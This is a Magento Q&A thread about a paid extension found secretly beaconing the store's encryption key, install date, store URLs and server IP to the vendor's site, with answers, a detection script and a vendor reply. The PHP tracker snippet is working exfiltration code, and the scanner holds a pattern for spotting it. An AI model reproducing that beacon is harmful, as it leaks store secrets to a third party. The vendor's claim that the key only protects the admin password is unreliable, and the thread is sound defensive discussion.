19

Forgive my ignorance, but the crypt key is used for decrypting Magento data, right? Is there any good reason for a module to access this? I stumbled across this code after installing Advanced Content Manager...

<div id="banana-tracker">
<?php
    $stores = Mage::app()->getStores();
    $key = (string)Mage::getConfig()->getNode('global/crypt/key');
    $date = (string)Mage::getConfig()->getNode('global/install/date');
    $serverIp = $_SERVER['SERVER_ADDR'];

    $params = 'key='.$key.'&date='.$date.'&';

    foreach($stores as $store)
    {
        $params .= 'store_'.$store->getCode().'='.urlencode(Mage::app()->getStore($store->getId())->getBaseUrl(Mage_Core_Model_Store::URL_TYPE_LINK)).'&';
    }
?>
<img src="http://www.advancedcontentmanager.com/images/distant/banana-tracker.gif?<?php echo $params; ?>time=<?php echo time(); ?>&serverip=<?php echo $serverIp; ?>" />
</div>

tylersDisplayName

2 Answers

11

Yes...there is a good reason.
They want to know it and log it, just in case. :)

You should uninstall the extension (most probably you already did). You should never use extensions that "phone home", no matter what data they send home.

You might want to list the extension here for others to see: Funny / Useless / Horrible code from Magento Extensions

Marius
  • 1
    "phoning home" unfortunately is done by a lot of modules. Amasty and Aheadworks do it as well :\ – Sander Mangel Mar 05 '15 at 20:39
  • 4
    This https://gist.github.com/miguelbalparda/b57a47a010a5995bc44d can be used to check for global/crypt/key from CLI in all the folders except app/code/core. – mbalparda Mar 05 '15 at 21:00
  • So not only are they able to decrypt cc data (good thing I don't save it) passwords, etc.. But I paid $300 for them to have that ability. That is what should be posted to Funny. – tylersDisplayName Mar 05 '15 at 22:26
  • 1
    @iUseMagentoNow. This is funny "ooh", not funny "ha ha". You should ask for your money back. – Marius Mar 06 '15 at 07:49
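The check mbalparda describes (search every folder except app/code/core for reads of global/crypt/key) can be done as a small scanner. The script below is an added example, not code from the original question, the answers or the linked gist: it walks a Magento 1 root, skips app/code/core (where Magento itself legitimately reads the key), reports each .php/.phtml line that references the key node, and lists any absolute http(s) URL found in the same file, since a file that both reads the key and embeds a remote URL is the pattern shown in the question. The sample tree it builds in a temporary directory is constructed for the example, and the host tracker.example.invalid is a placeholder.

```python
"""Find Magento 1 extension code that reads the crypt key (added example)."""
import re
import sys
import tempfile
from pathlib import Path

# Config node path read by the snippet in the question: 'global/crypt/key'.
KEY_RE = re.compile(r"crypt/key")
# Any absolute http(s) URL in the same file: a candidate destination for the key.
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")
# Path prefixes (relative to the Magento root) excluded from the scan; the core
# code base uses the key legitimately, var/ and media/ hold no module code.
SKIP_PREFIXES = (("app", "code", "core"), ("var",), ("media",))


def _is_skipped(rel_parts):
    return any(tuple(rel_parts[:len(prefix)]) == prefix for prefix in SKIP_PREFIXES)


def find_crypt_key_access(root):
    """Map relative path -> {'key_lines': [(line_no, text)], 'external_urls': [...]}
    for every .php/.phtml file outside SKIP_PREFIXES that references the key."""
    root = Path(root)
    report = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix not in (".php", ".phtml"):
            continue
        rel = path.relative_to(root)
        if _is_skipped(rel.parts):
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        key_lines = [(n, line.strip())
                     for n, line in enumerate(text.splitlines(), 1)
                     if KEY_RE.search(line)]
        if key_lines:
            report[rel.as_posix()] = {
                "key_lines": key_lines,
                "external_urls": sorted(set(URL_RE.findall(text))),
            }
    return report


# Constructed sample tree: one core file (must be skipped), one community module
# that reads the key but sends nothing, one admin template that reads the key and
# embeds a remote beacon URL, and one clean module.
SAMPLE_FILES = {
    "app/code/core/Mage/Core/Helper/Data.php":
        "<?php\n$key = (string)Mage::getConfig()->getNode('global/crypt/key');\n",
    "app/code/community/Vendor/Gateway/Model/Api.php":
        "<?php\n$key = (string)Mage::getConfig()->getNode('global/crypt/key');\n",
    "app/design/adminhtml/default/default/template/acm/tracker.phtml":
        "<?php\n"
        "    $key = (string)Mage::getConfig()->getNode('global/crypt/key');\n"
        "    $params = 'key=' . $key . '&';\n"
        "?>\n"
        "<img src=\"http://tracker.example.invalid/beacon.gif?<?php echo $params; ?>\" />\n",
    "app/code/community/Vendor/Clean/Helper/Data.php":
        "<?php\nclass Vendor_Clean_Helper_Data {}\n",
}


def build_sample_tree(base):
    for rel, content in SAMPLE_FILES.items():
        target = Path(base, *rel.split("/"))
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")


def scan_sample_tree():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as base:
        build_sample_tree(base)
        return find_crypt_key_access(base)


if __name__ == "__main__":
    # Usage: python scan_crypt_key.py /path/to/magento  (no argument: sample tree)
    report = find_crypt_key_access(sys.argv[1]) if len(sys.argv) > 1 else scan_sample_tree()
    for rel, info in report.items():
        flag = "SENDS EXTERNALLY?" if info["external_urls"] else ""
        print(f"{rel} {flag}")
        for n, line in info["key_lines"]:
            print(f"  line {n}: {line}")
        for url in info["external_urls"]:
            print(f"  url: {url}")
```

A hit is not proof of exfiltration (a payment module may legitimately decrypt stored gateway credentials), but a hit in a template together with a remote URL, as in the tracker above, is exactly what should be reviewed before the extension stays installed.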
8

We got the support request about this feature today. We already resolved it and removed this piece of code. A new release is available for all our customers in their customer area (for free, as we offer unlimited updates).

I know we need to justify this, so let's do that:

  • The goal of this tracker was ONLY to follow the non authorized use of our extension.
  • The tracker was only displayed in the admin area (none of your customers or anyone other than you and us has been able to see it).
  • We removed this in our DB too.
  • The key is only used to encrypt your admin password. As we usually work with all of you through support requests, you may have already sent your credentials to us by email anyway, for support. If we wanted your password, we would have sent it directly... It was not the goal.
  • Even with the key, your password is still encrypted. And Magento admin blocks the user after some attempts.

We recognize that it is a mistake, and this is the strength of the community and the open source system: we can fix and improve much faster. Thank you all for having alerted us; we will make more effort on vulnerabilities now.

Marius